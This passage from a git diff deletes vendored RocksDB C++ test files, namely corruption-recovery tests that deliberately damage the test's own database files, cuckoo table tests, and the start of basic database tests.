-        DBImpl* dbi = reinterpret_cast<DBImpl*>(db_);
-        dbi->TEST_FlushMemTable();
-      }
-      //if ((i % 100) == 0) fprintf(stderr, "@ %d of %d\n", i, n);
-      Slice key = Key(i, &key_space);
-      batch.Clear();
-      batch.Put(key, Value(i, &value_space));
-      ASSERT_OK(db_->Write(WriteOptions(), &batch));
-    }
-  }
-
-  void Check(int min_expected, int max_expected) {
-    uint64_t next_expected = 0;
-    uint64_t missed = 0;
-    int bad_keys = 0;
-    int bad_values = 0;
-    int correct = 0;
-    std::string value_space;
-    // Do not verify checksums. If we verify checksums then the
-    // db itself will raise errors because data is corrupted.
-    // Instead, we want the reads to be successful and this test
-    // will detect whether the appropriate corruptions have
-    // occurred.
-    Iterator* iter = db_->NewIterator(ReadOptions(false, true));
-    for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-      uint64_t key;
-      Slice in(iter->key());
-      if (!ConsumeDecimalNumber(&in, &key) ||
-          !in.empty() ||
-          key < next_expected) {
-        bad_keys++;
-        continue;
-      }
-      missed += (key - next_expected);
-      next_expected = key + 1;
-      if (iter->value() != Value(static_cast<int>(key), &value_space)) {
-        bad_values++;
-      } else {
-        correct++;
-      }
-    }
-    delete iter;
-
-    fprintf(stderr,
-      "expected=%d..%d; got=%d; bad_keys=%d; bad_values=%d; missed=%llu\n",
-            min_expected, max_expected, correct, bad_keys, bad_values,
-            static_cast<unsigned long long>(missed));
-    ASSERT_LE(min_expected, correct);
-    ASSERT_GE(max_expected, correct);
-  }
-
-  void CorruptFile(const std::string& fname, int offset, int bytes_to_corrupt) {
-    struct stat sbuf;
-    if (stat(fname.c_str(), &sbuf) != 0) {
-      const char* msg = strerror(errno);
-      FAIL() << fname << ": " << msg;
-    }
-
-    if (offset < 0) {
-      // Relative to end of file; make it absolute
-      if (-offset > sbuf.st_size) {
-        offset = 0;
-      } else {
-        offset = static_cast<int>(sbuf.st_size + offset);
-      }
-    }
-    if (offset > sbuf.st_size) {
-      offset = static_cast<int>(sbuf.st_size);
-    }
-    if (offset + bytes_to_corrupt > sbuf.st_size) {
-      bytes_to_corrupt = static_cast<int>(sbuf.st_size - offset);
-    }
-
-    // Do it
-    std::string contents;
-    Status s = ReadFileToString(Env::Default(), fname, &contents);
-    ASSERT_TRUE(s.ok()) << s.ToString();
-    for (int i = 0; i < bytes_to_corrupt; i++) {
-      contents[i + offset] ^= 0x80;
-    }
-    s = WriteStringToFile(Env::Default(), contents, fname);
-    ASSERT_TRUE(s.ok()) << s.ToString();
-    Options options;
-    EnvOptions env_options;
-    ASSERT_NOK(VerifySstFileChecksum(options, env_options, fname));
-  }
-
-  void Corrupt(FileType filetype, int offset, int bytes_to_corrupt) {
-    // Pick file to corrupt
-    std::vector<std::string> filenames;
-    ASSERT_OK(env_.GetChildren(dbname_, &filenames));
-    uint64_t number;
-    FileType type;
-    std::string fname;
-    int picked_number = -1;
-    for (size_t i = 0; i < filenames.size(); i++) {
-      if (ParseFileName(filenames[i], &number, &type) &&
-          type == filetype &&
-          static_cast<int>(number) > picked_number) {  // Pick latest file
-        fname = dbname_ + "/" + filenames[i];
-        picked_number = static_cast<int>(number);
-      }
-    }
-    ASSERT_TRUE(!fname.empty()) << filetype;
-
-    CorruptFile(fname, offset, bytes_to_corrupt);
-  }
-
-  // corrupts exactly one file at level `level`. if no file found at level,
-  // asserts
-  void CorruptTableFileAtLevel(int level, int offset, int bytes_to_corrupt) {
-    std::vector<LiveFileMetaData> metadata;
-    db_->GetLiveFilesMetaData(&metadata);
-    for (const auto& m : metadata) {
-      if (m.level == level) {
-        CorruptFile(dbname_ + "/" + m.name, offset, bytes_to_corrupt);
-        return;
-      }
-    }
-    FAIL() << "no file found at level";
-  }
-
-
-  int Property(const std::string& name) {
-    std::string property;
-    int result;
-    if (db_->GetProperty(name, &property) &&
-        sscanf(property.c_str(), "%d", &result) == 1) {
-      return result;
-    } else {
-      return -1;
-    }
-  }
-
-  // Return the ith key
-  Slice Key(int i, std::string* storage) {
-    char buf[100];
-    snprintf(buf, sizeof(buf), "%016d", i);
-    storage->assign(buf, strlen(buf));
-    return Slice(*storage);
-  }
-
-  // Return the value to associate with the specified key
-  Slice Value(int k, std::string* storage) {
-    if (k == 0) {
-      // Ugh.  Random seed of 0 used to produce no entropy.  This code
-      // preserves the implementation that was in place when all of the
-      // magic values in this file were picked.
-      *storage = std::string(kValueSize, ' ');
-      return Slice(*storage);
-    } else {
-      Random r(k);
-      return test::RandomString(&r, kValueSize, storage);
-    }
-  }
-};
-
-TEST_F(CorruptionTest, Recovery) {
-  Build(100);
-  Check(100, 100);
-#ifdef OS_WIN
-  // On Wndows OS Disk cache does not behave properly
-  // We do not call FlushBuffers on every Flush. If we do not close
-  // the log file prior to the corruption we end up with the first
-  // block not corrupted but only the second. However, under the debugger
-  // things work just fine but never pass when running normally
-  // For that reason people may want to run with unbuffered I/O. That option
-  // is not available for WAL though.
-  CloseDb();
-#endif
-  Corrupt(kLogFile, 19, 1);      // WriteBatch tag for first record
-  Corrupt(kLogFile, log::kBlockSize + 1000, 1);  // Somewhere in second block
-  ASSERT_TRUE(!TryReopen().ok());
-  options_.paranoid_checks = false;
-  Reopen(&options_);
-
-  // The 64 records in the first two log blocks are completely lost.
-  Check(36, 36);
-}
-
-TEST_F(CorruptionTest, RecoverWriteError) {
-  env_.writable_file_error_ = true;
-  Status s = TryReopen();
-  ASSERT_TRUE(!s.ok());
-}
-
-TEST_F(CorruptionTest, NewFileErrorDuringWrite) {
-  // Do enough writing to force minor compaction
-  env_.writable_file_error_ = true;
-  const int num =
-      static_cast<int>(3 + (Options().write_buffer_size / kValueSize));
-  std::string value_storage;
-  Status s;
-  bool failed = false;
-  for (int i = 0; i < num; i++) {
-    WriteBatch batch;
-    batch.Put("a", Value(100, &value_storage));
-    s = db_->Write(WriteOptions(), &batch);
-    if (!s.ok()) {
-      failed = true;
-    }
-    ASSERT_TRUE(!failed || !s.ok());
-  }
-  ASSERT_TRUE(!s.ok());
-  ASSERT_GE(env_.num_writable_file_errors_, 1);
-  env_.writable_file_error_ = false;
-  Reopen();
-}
-
-TEST_F(CorruptionTest, TableFile) {
-  Build(100);
-  DBImpl* dbi = reinterpret_cast<DBImpl*>(db_);
-  dbi->TEST_FlushMemTable();
-  dbi->TEST_CompactRange(0, nullptr, nullptr);
-  dbi->TEST_CompactRange(1, nullptr, nullptr);
-
-  Corrupt(kTableFile, 100, 1);
-  Check(99, 99);
-  ASSERT_NOK(dbi->VerifyChecksum());
-}
-
-TEST_F(CorruptionTest, TableFileIndexData) {
-  Options options;
-  // very big, we'll trigger flushes manually
-  options.write_buffer_size = 100 * 1024 * 1024;
-  Reopen(&options);
-  // build 2 tables, flush at 5000
-  Build(10000, 5000);
-  DBImpl* dbi = reinterpret_cast<DBImpl*>(db_);
-  dbi->TEST_FlushMemTable();
-
-  // corrupt an index block of an entire file
-  Corrupt(kTableFile, -2000, 500);
-  Reopen();
-  dbi = reinterpret_cast<DBImpl*>(db_);
-  // one full file should be readable, since only one was corrupted
-  // the other file should be fully non-readable, since index was corrupted
-  Check(5000, 5000);
-  ASSERT_NOK(dbi->VerifyChecksum());
-}
-
-TEST_F(CorruptionTest, MissingDescriptor) {
-  Build(1000);
-  RepairDB();
-  Reopen();
-  Check(1000, 1000);
-}
-
-TEST_F(CorruptionTest, SequenceNumberRecovery) {
-  ASSERT_OK(db_->Put(WriteOptions(), "foo", "v1"));
-  ASSERT_OK(db_->Put(WriteOptions(), "foo", "v2"));
-  ASSERT_OK(db_->Put(WriteOptions(), "foo", "v3"));
-  ASSERT_OK(db_->Put(WriteOptions(), "foo", "v4"));
-  ASSERT_OK(db_->Put(WriteOptions(), "foo", "v5"));
-  RepairDB();
-  Reopen();
-  std::string v;
-  ASSERT_OK(db_->Get(ReadOptions(), "foo", &v));
-  ASSERT_EQ("v5", v);
-  // Write something.  If sequence number was not recovered properly,
-  // it will be hidden by an earlier write.
-  ASSERT_OK(db_->Put(WriteOptions(), "foo", "v6"));
-  ASSERT_OK(db_->Get(ReadOptions(), "foo", &v));
-  ASSERT_EQ("v6", v);
-  Reopen();
-  ASSERT_OK(db_->Get(ReadOptions(), "foo", &v));
-  ASSERT_EQ("v6", v);
-}
-
-TEST_F(CorruptionTest, CorruptedDescriptor) {
-  ASSERT_OK(db_->Put(WriteOptions(), "foo", "hello"));
-  DBImpl* dbi = reinterpret_cast<DBImpl*>(db_);
-  dbi->TEST_FlushMemTable();
-  dbi->TEST_CompactRange(0, nullptr, nullptr);
-
-  Corrupt(kDescriptorFile, 0, 1000);
-  Status s = TryReopen();
-  ASSERT_TRUE(!s.ok());
-
-  RepairDB();
-  Reopen();
-  std::string v;
-  ASSERT_OK(db_->Get(ReadOptions(), "foo", &v));
-  ASSERT_EQ("hello", v);
-}
-
-TEST_F(CorruptionTest, CompactionInputError) {
-  Options options;
-  Reopen(&options);
-  Build(10);
-  DBImpl* dbi = reinterpret_cast<DBImpl*>(db_);
-  dbi->TEST_FlushMemTable();
-  dbi->TEST_CompactRange(0, nullptr, nullptr);
-  dbi->TEST_CompactRange(1, nullptr, nullptr);
-  ASSERT_EQ(1, Property("rocksdb.num-files-at-level2"));
-
-  Corrupt(kTableFile, 100, 1);
-  Check(9, 9);
-  ASSERT_NOK(dbi->VerifyChecksum());
-
-  // Force compactions by writing lots of values
-  Build(10000);
-  Check(10000, 10000);
-  ASSERT_NOK(dbi->VerifyChecksum());
-}
-
-TEST_F(CorruptionTest, CompactionInputErrorParanoid) {
-  Options options;
-  options.paranoid_checks = true;
-  options.write_buffer_size = 131072;
-  options.max_write_buffer_number = 2;
-  Reopen(&options);
-  DBImpl* dbi = reinterpret_cast<DBImpl*>(db_);
-
-  // Fill levels >= 1
-  for (int level = 1; level < dbi->NumberLevels(); level++) {
-    dbi->Put(WriteOptions(), "", "begin");
-    dbi->Put(WriteOptions(), "~", "end");
-    dbi->TEST_FlushMemTable();
-    for (int comp_level = 0; comp_level < dbi->NumberLevels() - level;
-         ++comp_level) {
-      dbi->TEST_CompactRange(comp_level, nullptr, nullptr);
-    }
-  }
-
-  Reopen(&options);
-
-  dbi = reinterpret_cast<DBImpl*>(db_);
-  Build(10);
-  dbi->TEST_FlushMemTable();
-  dbi->TEST_WaitForCompact();
-  ASSERT_EQ(1, Property("rocksdb.num-files-at-level0"));
-
-  CorruptTableFileAtLevel(0, 100, 1);
-  Check(9, 9);
-  ASSERT_NOK(dbi->VerifyChecksum());
-
-  // Write must eventually fail because of corrupted table
-  Status s;
-  std::string tmp1, tmp2;
-  bool failed = false;
-  for (int i = 0; i < 10000; i++) {
-    s = db_->Put(WriteOptions(), Key(i, &tmp1), Value(i, &tmp2));
-    if (!s.ok()) {
-      failed = true;
-    }
-    // if one write failed, every subsequent write must fail, too
-    ASSERT_TRUE(!failed || !s.ok()) << "write did not fail in a corrupted db";
-  }
-  ASSERT_TRUE(!s.ok()) << "write did not fail in corrupted paranoid db";
-}
-
-TEST_F(CorruptionTest, UnrelatedKeys) {
-  Build(10);
-  DBImpl* dbi = reinterpret_cast<DBImpl*>(db_);
-  dbi->TEST_FlushMemTable();
-  Corrupt(kTableFile, 100, 1);
-  ASSERT_NOK(dbi->VerifyChecksum());
-
-  std::string tmp1, tmp2;
-  ASSERT_OK(db_->Put(WriteOptions(), Key(1000, &tmp1), Value(1000, &tmp2)));
-  std::string v;
-  ASSERT_OK(db_->Get(ReadOptions(), Key(1000, &tmp1), &v));
-  ASSERT_EQ(Value(1000, &tmp2).ToString(), v);
-  dbi->TEST_FlushMemTable();
-  ASSERT_OK(db_->Get(ReadOptions(), Key(1000, &tmp1), &v));
-  ASSERT_EQ(Value(1000, &tmp2).ToString(), v);
-}
-
-TEST_F(CorruptionTest, FileSystemStateCorrupted) {
-  for (int iter = 0; iter < 2; ++iter) {
-    Options options;
-    options.paranoid_checks = true;
-    options.create_if_missing = true;
-    Reopen(&options);
-    Build(10);
-    ASSERT_OK(db_->Flush(FlushOptions()));
-    DBImpl* dbi = reinterpret_cast<DBImpl*>(db_);
-    std::vector<LiveFileMetaData> metadata;
-    dbi->GetLiveFilesMetaData(&metadata);
-    ASSERT_GT(metadata.size(), size_t(0));
-    std::string filename = dbname_ + metadata[0].name;
-
-    delete db_;
-    db_ = nullptr;
-
-    if (iter == 0) {  // corrupt file size
-      unique_ptr<WritableFile> file;
-      env_.NewWritableFile(filename, &file, EnvOptions());
-      file->Append(Slice("corrupted sst"));
-      file.reset();
-    } else {  // delete the file
-      env_.DeleteFile(filename);
-    }
-
-    Status x = TryReopen(&options);
-    ASSERT_TRUE(x.IsCorruption());
-    DestroyDB(dbname_, options_);
-    Reopen(&options);
-  }
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as RepairDB() is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/cuckoo_table_db_test.cc b/thirdparty/rocksdb/db/cuckoo_table_db_test.cc
deleted file mode 100644
index e7c2d27..0000000
--- a/thirdparty/rocksdb/db/cuckoo_table_db_test.cc
+++ /dev/null
@@ -1,341 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "db/db_impl.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "table/cuckoo_table_factory.h"
-#include "table/cuckoo_table_reader.h"
-#include "table/meta_blocks.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-class CuckooTableDBTest : public testing::Test {
- private:
-  std::string dbname_;
-  Env* env_;
-  DB* db_;
-
- public:
-  CuckooTableDBTest() : env_(Env::Default()) {
-    dbname_ = test::TmpDir() + "/cuckoo_table_db_test";
-    EXPECT_OK(DestroyDB(dbname_, Options()));
-    db_ = nullptr;
-    Reopen();
-  }
-
-  ~CuckooTableDBTest() {
-    delete db_;
-    EXPECT_OK(DestroyDB(dbname_, Options()));
-  }
-
-  Options CurrentOptions() {
-    Options options;
-    options.table_factory.reset(NewCuckooTableFactory());
-    options.memtable_factory.reset(NewHashLinkListRepFactory(4, 0, 3, true));
-    options.allow_mmap_reads = true;
-    options.create_if_missing = true;
-    options.allow_concurrent_memtable_write = false;
-    return options;
-  }
-
-  DBImpl* dbfull() {
-    return reinterpret_cast<DBImpl*>(db_);
-  }
-
-  // The following util methods are copied from plain_table_db_test.
-  void Reopen(Options* options = nullptr) {
-    delete db_;
-    db_ = nullptr;
-    Options opts;
-    if (options != nullptr) {
-      opts = *options;
-    } else {
-      opts = CurrentOptions();
-      opts.create_if_missing = true;
-    }
-    ASSERT_OK(DB::Open(opts, dbname_, &db_));
-  }
-
-  Status Put(const Slice& k, const Slice& v) {
-    return db_->Put(WriteOptions(), k, v);
-  }
-
-  Status Delete(const std::string& k) {
-    return db_->Delete(WriteOptions(), k);
-  }
-
-  std::string Get(const std::string& k) {
-    ReadOptions options;
-    std::string result;
-    Status s = db_->Get(options, k, &result);
-    if (s.IsNotFound()) {
-      result = "NOT_FOUND";
-    } else if (!s.ok()) {
-      result = s.ToString();
-    }
-    return result;
-  }
-
-  int NumTableFilesAtLevel(int level) {
-    std::string property;
-    EXPECT_TRUE(db_->GetProperty(
-        "rocksdb.num-files-at-level" + NumberToString(level), &property));
-    return atoi(property.c_str());
-  }
-
-  // Return spread of files per level
-  std::string FilesPerLevel() {
-    std::string result;
-    size_t last_non_zero_offset = 0;
-    for (int level = 0; level < db_->NumberLevels(); level++) {
-      int f = NumTableFilesAtLevel(level);
-      char buf[100];
-      snprintf(buf, sizeof(buf), "%s%d", (level ? "," : ""), f);
-      result += buf;
-      if (f > 0) {
-        last_non_zero_offset = result.size();
-      }
-    }
-    result.resize(last_non_zero_offset);
-    return result;
-  }
-};
-
-TEST_F(CuckooTableDBTest, Flush) {
-  // Try with empty DB first.
-  ASSERT_TRUE(dbfull() != nullptr);
-  ASSERT_EQ("NOT_FOUND", Get("key2"));
-
-  // Add some values to db.
-  Options options = CurrentOptions();
-  Reopen(&options);
-
-  ASSERT_OK(Put("key1", "v1"));
-  ASSERT_OK(Put("key2", "v2"));
-  ASSERT_OK(Put("key3", "v3"));
-  dbfull()->TEST_FlushMemTable();
-
-  TablePropertiesCollection ptc;
-  reinterpret_cast<DB*>(dbfull())->GetPropertiesOfAllTables(&ptc);
-  ASSERT_EQ(1U, ptc.size());
-  ASSERT_EQ(3U, ptc.begin()->second->num_entries);
-  ASSERT_EQ("1", FilesPerLevel());
-
-  ASSERT_EQ("v1", Get("key1"));
-  ASSERT_EQ("v2", Get("key2"));
-  ASSERT_EQ("v3", Get("key3"));
-  ASSERT_EQ("NOT_FOUND", Get("key4"));
-
-  // Now add more keys and flush.
-  ASSERT_OK(Put("key4", "v4"));
-  ASSERT_OK(Put("key5", "v5"));
-  ASSERT_OK(Put("key6", "v6"));
-  dbfull()->TEST_FlushMemTable();
-
-  reinterpret_cast<DB*>(dbfull())->GetPropertiesOfAllTables(&ptc);
-  ASSERT_EQ(2U, ptc.size());
-  auto row = ptc.begin();
-  ASSERT_EQ(3U, row->second->num_entries);
-  ASSERT_EQ(3U, (++row)->second->num_entries);
-  ASSERT_EQ("2", FilesPerLevel());
-  ASSERT_EQ("v1", Get("key1"));
-  ASSERT_EQ("v2", Get("key2"));
-  ASSERT_EQ("v3", Get("key3"));
-  ASSERT_EQ("v4", Get("key4"));
-  ASSERT_EQ("v5", Get("key5"));
-  ASSERT_EQ("v6", Get("key6"));
-
-  ASSERT_OK(Delete("key6"));
-  ASSERT_OK(Delete("key5"));
-  ASSERT_OK(Delete("key4"));
-  dbfull()->TEST_FlushMemTable();
-  reinterpret_cast<DB*>(dbfull())->GetPropertiesOfAllTables(&ptc);
-  ASSERT_EQ(3U, ptc.size());
-  row = ptc.begin();
-  ASSERT_EQ(3U, row->second->num_entries);
-  ASSERT_EQ(3U, (++row)->second->num_entries);
-  ASSERT_EQ(3U, (++row)->second->num_entries);
-  ASSERT_EQ("3", FilesPerLevel());
-  ASSERT_EQ("v1", Get("key1"));
-  ASSERT_EQ("v2", Get("key2"));
-  ASSERT_EQ("v3", Get("key3"));
-  ASSERT_EQ("NOT_FOUND", Get("key4"));
-  ASSERT_EQ("NOT_FOUND", Get("key5"));
-  ASSERT_EQ("NOT_FOUND", Get("key6"));
-}
-
-TEST_F(CuckooTableDBTest, FlushWithDuplicateKeys) {
-  Options options = CurrentOptions();
-  Reopen(&options);
-  ASSERT_OK(Put("key1", "v1"));
-  ASSERT_OK(Put("key2", "v2"));
-  ASSERT_OK(Put("key1", "v3"));  // Duplicate
-  dbfull()->TEST_FlushMemTable();
-
-  TablePropertiesCollection ptc;
-  reinterpret_cast<DB*>(dbfull())->GetPropertiesOfAllTables(&ptc);
-  ASSERT_EQ(1U, ptc.size());
-  ASSERT_EQ(2U, ptc.begin()->second->num_entries);
-  ASSERT_EQ("1", FilesPerLevel());
-  ASSERT_EQ("v3", Get("key1"));
-  ASSERT_EQ("v2", Get("key2"));
-}
-
-namespace {
-static std::string Key(int i) {
-  char buf[100];
-  snprintf(buf, sizeof(buf), "key_______%06d", i);
-  return std::string(buf);
-}
-static std::string Uint64Key(uint64_t i) {
-  std::string str;
-  str.resize(8);
-  memcpy(&str[0], static_cast<void*>(&i), 8);
-  return str;
-}
-}  // namespace.
-
-TEST_F(CuckooTableDBTest, Uint64Comparator) {
-  Options options = CurrentOptions();
-  options.comparator = test::Uint64Comparator();
-  Reopen(&options);
-
-  ASSERT_OK(Put(Uint64Key(1), "v1"));
-  ASSERT_OK(Put(Uint64Key(2), "v2"));
-  ASSERT_OK(Put(Uint64Key(3), "v3"));
-  dbfull()->TEST_FlushMemTable();
-
-  ASSERT_EQ("v1", Get(Uint64Key(1)));
-  ASSERT_EQ("v2", Get(Uint64Key(2)));
-  ASSERT_EQ("v3", Get(Uint64Key(3)));
-  ASSERT_EQ("NOT_FOUND", Get(Uint64Key(4)));
-
-  // Add more keys.
-  ASSERT_OK(Delete(Uint64Key(2)));  // Delete.
-  dbfull()->TEST_FlushMemTable();
-  ASSERT_OK(Put(Uint64Key(3), "v0"));  // Update.
-  ASSERT_OK(Put(Uint64Key(4), "v4"));
-  dbfull()->TEST_FlushMemTable();
-  ASSERT_EQ("v1", Get(Uint64Key(1)));
-  ASSERT_EQ("NOT_FOUND", Get(Uint64Key(2)));
-  ASSERT_EQ("v0", Get(Uint64Key(3)));
-  ASSERT_EQ("v4", Get(Uint64Key(4)));
-}
-
-TEST_F(CuckooTableDBTest, CompactionIntoMultipleFiles) {
-  // Create a big L0 file and check it compacts into multiple files in L1.
-  Options options = CurrentOptions();
-  options.write_buffer_size = 270 << 10;
-  // Two SST files should be created, each containing 14 keys.
-  // Number of buckets will be 16. Total size ~156 KB.
-  options.target_file_size_base = 160 << 10;
-  Reopen(&options);
-
-  // Write 28 values, each 10016 B ~ 10KB
-  for (int idx = 0; idx < 28; ++idx) {
-    ASSERT_OK(Put(Key(idx), std::string(10000, 'a' + idx)));
-  }
-  dbfull()->TEST_WaitForFlushMemTable();
-  ASSERT_EQ("1", FilesPerLevel());
-
-  dbfull()->TEST_CompactRange(0, nullptr, nullptr, nullptr,
-                              true /* disallow trivial move */);
-  ASSERT_EQ("0,2", FilesPerLevel());
-  for (int idx = 0; idx < 28; ++idx) {
-    ASSERT_EQ(std::string(10000, 'a' + idx), Get(Key(idx)));
-  }
-}
-
-TEST_F(CuckooTableDBTest, SameKeyInsertedInTwoDifferentFilesAndCompacted) {
-  // Insert same key twice so that they go to different SST files. Then wait for
-  // compaction and check if the latest value is stored and old value removed.
-  Options options = CurrentOptions();
-  options.write_buffer_size = 100 << 10;  // 100KB
-  options.level0_file_num_compaction_trigger = 2;
-  Reopen(&options);
-
-  // Write 11 values, each 10016 B
-  for (int idx = 0; idx < 11; ++idx) {
-    ASSERT_OK(Put(Key(idx), std::string(10000, 'a')));
-  }
-  dbfull()->TEST_WaitForFlushMemTable();
-  ASSERT_EQ("1", FilesPerLevel());
-
-  // Generate one more file in level-0, and should trigger level-0 compaction
-  for (int idx = 0; idx < 11; ++idx) {
-    ASSERT_OK(Put(Key(idx), std::string(10000, 'a' + idx)));
-  }
-  dbfull()->TEST_WaitForFlushMemTable();
-  dbfull()->TEST_CompactRange(0, nullptr, nullptr);
-
-  ASSERT_EQ("0,1", FilesPerLevel());
-  for (int idx = 0; idx < 11; ++idx) {
-    ASSERT_EQ(std::string(10000, 'a' + idx), Get(Key(idx)));
-  }
-}
-
-TEST_F(CuckooTableDBTest, AdaptiveTable) {
-  Options options = CurrentOptions();
-
-  // Write some keys using cuckoo table.
-  options.table_factory.reset(NewCuckooTableFactory());
-  Reopen(&options);
-
-  ASSERT_OK(Put("key1", "v1"));
-  ASSERT_OK(Put("key2", "v2"));
-  ASSERT_OK(Put("key3", "v3"));
-  dbfull()->TEST_FlushMemTable();
-
-  // Write some keys using plain table.
-  options.create_if_missing = false;
-  options.table_factory.reset(NewPlainTableFactory());
-  Reopen(&options);
-  ASSERT_OK(Put("key4", "v4"));
-  ASSERT_OK(Put("key1", "v5"));
-  dbfull()->TEST_FlushMemTable();
-
-  // Write some keys using block based table.
-  std::shared_ptr<TableFactory> block_based_factory(
-      NewBlockBasedTableFactory());
-  options.table_factory.reset(NewAdaptiveTableFactory(block_based_factory));
-  Reopen(&options);
-  ASSERT_OK(Put("key5", "v6"));
-  ASSERT_OK(Put("key2", "v7"));
-  dbfull()->TEST_FlushMemTable();
-
-  ASSERT_EQ("v5", Get("key1"));
-  ASSERT_EQ("v7", Get("key2"));
-  ASSERT_EQ("v3", Get("key3"));
-  ASSERT_EQ("v4", Get("key4"));
-  ASSERT_EQ("v6", Get("key5"));
-}
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  if (rocksdb::port::kLittleEndian) {
-    ::testing::InitGoogleTest(&argc, argv);
-    return RUN_ALL_TESTS();
-  }
-  else {
-    fprintf(stderr, "SKIPPED as Cuckoo table doesn't support Big Endian\n");
-    return 0;
-  }
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as Cuckoo table is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/db_basic_test.cc b/thirdparty/rocksdb/db/db_basic_test.cc
deleted file mode 100644
index 654a457..0000000
--- a/thirdparty/rocksdb/db/db_basic_test.cc
+++ /dev/null
@@ -1,856 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#include "db/db_test_util.h"
-#include "port/stack_trace.h"
-#include "rocksdb/perf_context.h"
-#if !defined(ROCKSDB_LITE)
-#include "util/sync_point.h"
-#endif
-
-namespace rocksdb {
-
-class DBBasicTest : public DBTestBase {
- public:
-  DBBasicTest() : DBTestBase("/db_basic_test") {}
-};
-
-TEST_F(DBBasicTest, OpenWhenOpen) {
-  Options options = CurrentOptions();
-  options.env = env_;
-  rocksdb::DB* db2 = nullptr;
-  rocksdb::Status s = DB::Open(options, dbname_, &db2);
-
-  ASSERT_EQ(Status::Code::kIOError, s.code());
-  ASSERT_EQ(Status::SubCode::kNone, s.subcode());
-  ASSERT_TRUE(strstr(s.getState(), "lock ") != nullptr);
-
-  delete db2;
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBBasicTest, ReadOnlyDB) {
-  ASSERT_OK(Put("foo", "v1"));
-  ASSERT_OK(Put("bar", "v2"));
-  ASSERT_OK(Put("foo", "v3"));
-  Close();
-
-  auto options = CurrentOptions();
-  assert(options.env = env_);
-  ASSERT_OK(ReadOnlyReopen(options));
-  ASSERT_EQ("v3", Get("foo"));
-  ASSERT_EQ("v2", Get("bar"));
-  Iterator* iter = db_->NewIterator(ReadOptions());
-  int count = 0;
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    ASSERT_OK(iter->status());
-    ++count;
-  }
-  ASSERT_EQ(count, 2);
-  delete iter;
-  Close();
-
-  // Reopen and flush memtable.
-  Reopen(options);
-  Flush();
-  Close();
-  // Now check keys in read only mode.
-  ASSERT_OK(ReadOnlyReopen(options));
-  ASSERT_EQ("v3", Get("foo"));
-  ASSERT_EQ("v2", Get("bar"));
-  ASSERT_TRUE(db_->SyncWAL().IsNotSupported());
-}
-
-TEST_F(DBBasicTest, CompactedDB) {
-  const uint64_t kFileSize = 1 << 20;
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = true;
-  options.write_buffer_size = kFileSize;
-  options.target_file_size_base = kFileSize;
-  options.max_bytes_for_level_base = 1 << 30;
-  options.compression = kNoCompression;
-  Reopen(options);
-  // 1 L0 file, use CompactedDB if max_open_files = -1
-  ASSERT_OK(Put("aaa", DummyString(kFileSize / 2, '1')));
-  Flush();
-  Close();
-  ASSERT_OK(ReadOnlyReopen(options));
-  Status s = Put("new", "value");
-  ASSERT_EQ(s.ToString(),
-            "Not implemented: Not supported operation in read only mode.");
-  ASSERT_EQ(DummyString(kFileSize / 2, '1'), Get("aaa"));
-  Close();
-  options.max_open_files = -1;
-  ASSERT_OK(ReadOnlyReopen(options));
-  s = Put("new", "value");
-  ASSERT_EQ(s.ToString(),
-            "Not implemented: Not supported in compacted db mode.");
-  ASSERT_EQ(DummyString(kFileSize / 2, '1'), Get("aaa"));
-  Close();
-  Reopen(options);
-  // Add more L0 files
-  ASSERT_OK(Put("bbb", DummyString(kFileSize / 2, '2')));
-  Flush();
-  ASSERT_OK(Put("aaa", DummyString(kFileSize / 2, 'a')));
-  Flush();
-  ASSERT_OK(Put("bbb", DummyString(kFileSize / 2, 'b')));
-  ASSERT_OK(Put("eee", DummyString(kFileSize / 2, 'e')));
-  Flush();
-  Close();
-
-  ASSERT_OK(ReadOnlyReopen(options));
-  // Fallback to read-only DB
-  s = Put("new", "value");
-  ASSERT_EQ(s.ToString(),
-            "Not implemented: Not supported operation in read only mode.");
-  Close();
-
-  // Full compaction
-  Reopen(options);
-  // Add more keys
-  ASSERT_OK(Put("fff", DummyString(kFileSize / 2, 'f')));
-  ASSERT_OK(Put("hhh", DummyString(kFileSize / 2, 'h')));
-  ASSERT_OK(Put("iii", DummyString(kFileSize / 2, 'i')));
-  ASSERT_OK(Put("jjj", DummyString(kFileSize / 2, 'j')));
-  db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  ASSERT_EQ(3, NumTableFilesAtLevel(1));
-  Close();
-
-  // CompactedDB
-  ASSERT_OK(ReadOnlyReopen(options));
-  s = Put("new", "value");
-  ASSERT_EQ(s.ToString(),
-            "Not implemented: Not supported in compacted db mode.");
-  ASSERT_EQ("NOT_FOUND", Get("abc"));
-  ASSERT_EQ(DummyString(kFileSize / 2, 'a'), Get("aaa"));
-  ASSERT_EQ(DummyString(kFileSize / 2, 'b'), Get("bbb"));
-  ASSERT_EQ("NOT_FOUND", Get("ccc"));
-  ASSERT_EQ(DummyString(kFileSize / 2, 'e'), Get("eee"));
